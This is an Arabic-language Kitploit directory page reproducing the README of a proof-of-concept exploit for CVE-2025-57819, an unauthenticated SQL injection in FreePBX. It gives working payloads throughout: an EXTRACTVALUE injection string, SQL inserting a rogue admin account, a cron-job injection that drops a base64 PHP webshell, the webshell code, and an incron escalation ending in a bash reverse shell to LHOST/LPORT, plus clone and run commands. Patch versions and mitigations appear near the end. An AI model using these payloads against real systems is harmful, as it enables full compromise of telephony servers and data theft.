Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FreePBX-SQLi-RCE — إثبات مفهوم استغلال لـ CVE-2025-57819، وهو حقن SQL غير مُصادَق عليه في FreePBX يتسلسل لإنشاء حساب مسؤول، ونشر webshell، والتصعيد إلى root للوصول إلى RCE. | Kitploit
أدوات/GitHubGitHub/thescriptkiddoz/freepbx-sqli-rce
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالأوراق والأبحاثأداة الوصول عن بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
تطوير الحمولات
GitHubthescriptkiddoz/freepbx-sqli-rce

FreePBX-SQLi-RCE

إثبات مفهوم استغلال لـ CVE-2025-57819، وهو حقن SQL غير مُصادَق عليه في FreePBX يتسلسل لإنشاء حساب مسؤول، ونشر webshell، والتصعيد إلى root للوصول إلى RCE.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

FreePBX CVE-2025-57819 - حقن SQL غير مُصادق عليه إلى تنفيذ أوامر عن بُعد (PoC)

Python License

للأغراض التعليمية والبحث الأمني فقط - راجع الإشعار القانوني أدناه

إثبات مفهوم استغلال لـ CVE-2025-57819، وهي ثغرة حقن SQL حرجة غير مُصادق عليها في FreePBX تسمح بتنفيذ أوامر عن بُعد. تم نشر هذا الـ PoC بعد إصدار التصحيحات الرسمية لأغراض البحث الأمني والاختبار المُصرّح به فقط.

نظرة عامة

إصدارات FreePBX 15.x و16.x و17.x (الأقدم من الإصدارات المُصحّحة) معرّضة لثغرة حقن SQL غير مُصادق عليها في معالج AJAX الخاص بوحدة endpoint. تسمح سلسلة الثغرات هذه بما يلي:

  1. إنشاء حسابات إدارية عبر حقن SQL
  2. نشر webshells عبر حقن مهام cron المُصادق عليها
  3. الترقية إلى root (إذا كان incron متاحًا) عبر سلسلة خطافات sysadmin_manager
  4. اختراق النظام بالكامل مع الوصول عبر reverse shell

تفاصيل الثغرة

معرّف CVECVE-2025-57819
النوعحقن SQL غير مُصادق عليه (قائم على الأخطاء)
CVSS9.8 / 10.0 (حرجة)
المتأثرةFreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3
المُصحّحة15.0.66, 16.0.89, 17.0.3+
CISA KEVنعم (29 أغسطس 2025)

نقطة النهاية المعرّضة

GET /admin/ajax.php?brand=<PAYLOAD>

يقبل المعامل brand في معالج AJAX الخاص بوحدة endpoint مدخلات المستخدم دون التحقق منها، مما يؤدي إلى حقن SQL قائم على الأخطاء.


سلسلة الاستغلال

المرحلة 1: حقن SQL وإنشاء حساب إداري

تحقق من حقن SQL باستخدام استخراج قائم على الأخطاء عبر EXTRACTVALUE() لتسريب اسم قاعدة البيانات:

x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

أدخل مستخدمًا إداريًا جديدًا في asterisk.ampusers:

INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)

المرحلة 2: حقن مهام cron المُصادق عليها

باستخدام بيانات اعتماد إدارية صالحة، يُصادق الاستغلال على FreePBX ويُنشئ جلسة مُصادق عليها. يتم حفظ ملفات تعريف ارتباط الجلسة واستخدامها لجميع الطلبات المُصادق عليها اللاحقة.

احقن أمر webshell في asterisk.cron_jobs:

INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

يُنفّذ مشغّل cron الخاص بـ FreePBX الأمر كمستخدم asterisk، مما يُسقط webshell بلغة PHP.

المرحلة 3: تفعيل webshell

يتم نشر webshell بلغة PHP إلى /var/www/html/shell.php:

<?php system($_GET['cmd']); ?>

يستعلم الاستغلال عن webshell حتى تفعيله، محققًا تنفيذ أوامر عن بُعد كمستخدم asterisk (uid=999).

المرحلة 4: ترقية الصلاحيات (شرطية)

إذا كان incron مُهيّأً على الهدف:

  1. أنشئ ملف تشغيل في /var/spool/asterisk/incron/
  2. يكتشف incrond (الذي يعمل كـ root) إنشاء الملف
  3. يستدعي /usr/bin/sysadmin_manager باسم ملف التشغيل
  4. يتحقق sysadmin_manager من توقيع GPG ويوزّع إلى خطاف fwconsole-commands
  5. يفكّ الخطاف ترميز الحمولة ويُنفّذ: /usr/sbin/fwconsole <COMMAND>
  6. حقن الأوامر: help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

النتيجة: صدفة root على مستمع عكسي (إذا كان incron متاحًا).


ما الذي يستغله

  • عدم التحقق من المدخلات في المعامل brand
  • تنفيذ الاستعلامات المكدّسة يسمح بالتلاعب بقاعدة البيانات
  • جدول asterisk.cron_jobs القابل للكتابة يُنفّذ الأوامر كمستخدم asterisk
  • استمرارية الجلسة المُصادق عليها عبر ملفات تعريف الارتباط من الحساب الإداري المُنشأ
  • مراقبة نظام الملفات عبر Incron التي تعمل كـ root
  • تنفيذ خطاف fwconsole غير المُتحقق منه مع حقن الأوامر

التثبيت

git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

الاستخدام

# Setup Netcat Listener
nc -lvnp <Listener Port>

# Run The Exploit
python3 JTR-CVE-2025-57819.py <TARGET_IP> <YOUR_IP> <PORT>

إثبات المفهوم

PoC Screenshot


الإصدارات المتأثرة

الإصدارالحالة
15.0.0 - 15.0.65معرّض
15.0.66+مُصحّح
16.0.0 - 16.0.88معرّض
16.0.89+مُصحّح
17.0.0 - 17.0.2معرّض
17.0.3+مُصحّح

التخفيف

فوري:

  • قيّد الوصول إلى /admin/ajax.php من الشبكات غير الموثوقة
  • عطّل incron إذا لم يكن مطلوبًا: systemctl disable incrond

دائم: قم بالترقية إلى الإصدارات المُصحّحة: 15.0.66+ أو 16.0.89+ أو 17.0.3+


المراجع

  • CVE-2025-57819
  • CISA KEV Catalog
  • FreePBX Security Advisory

إشعار قانوني

⚠️ إخلاء المسؤولية

يُقدَّم إثبات المفهوم هذا فقط للاختبار الأمني المُصرّح به والأغراض التعليمية. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة.

يجب عليك الامتثال لـ:

  • قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) والقوانين المكافئة في نطاق اختصاصك
  • اختبر فقط الأنظمة التي تملكها أو لديك تصريح كتابي صريح لاختبارها
  • احصل على إذن كتابي قبل أي اختبار أمني
  • ممارسات الإفصاح المسؤول
  • لوائح الخصوصية وحماية البيانات (GDPR، CCPA، إلخ)

الاستخدامات المحظورة:

  • الوصول غير المُصرّح به إلى أنظمة الحاسوب
  • اختبار الاختراق دون موافقة كتابية
  • تعطيل الخدمات أو سرقة البيانات
  • أي نشاط ضار أو غير قانوني

إخلاء المسؤولية: المؤلف غير مسؤول عن:

  • الوصول غير المُصرّح به أو التهم الجنائية
  • الأضرار التي تلحق بالأنظمة أو فقدان البيانات
  • العواقب القانونية لسوء الاستخدام
  • انتهاكات قوانين الاحتيال الحاسوبي

هذه الثغرة:

  • مُفصح عنها علنًا (CVE-2025-57819)
  • التصحيحات متاحة علنًا
  • منشورة لأغراض البحث الأمني فقط
  • تمت مشاركتها بمسؤولية بعد إصدار التصحيح

المؤلف

JazzTheRabbit

  • GitHub: @JazzTheRabbit
  • HackTheBox: @JazzTheRabbit
  • YouTube: JazzTheRabbit

الترخيص

MIT License

تنزيل الأداة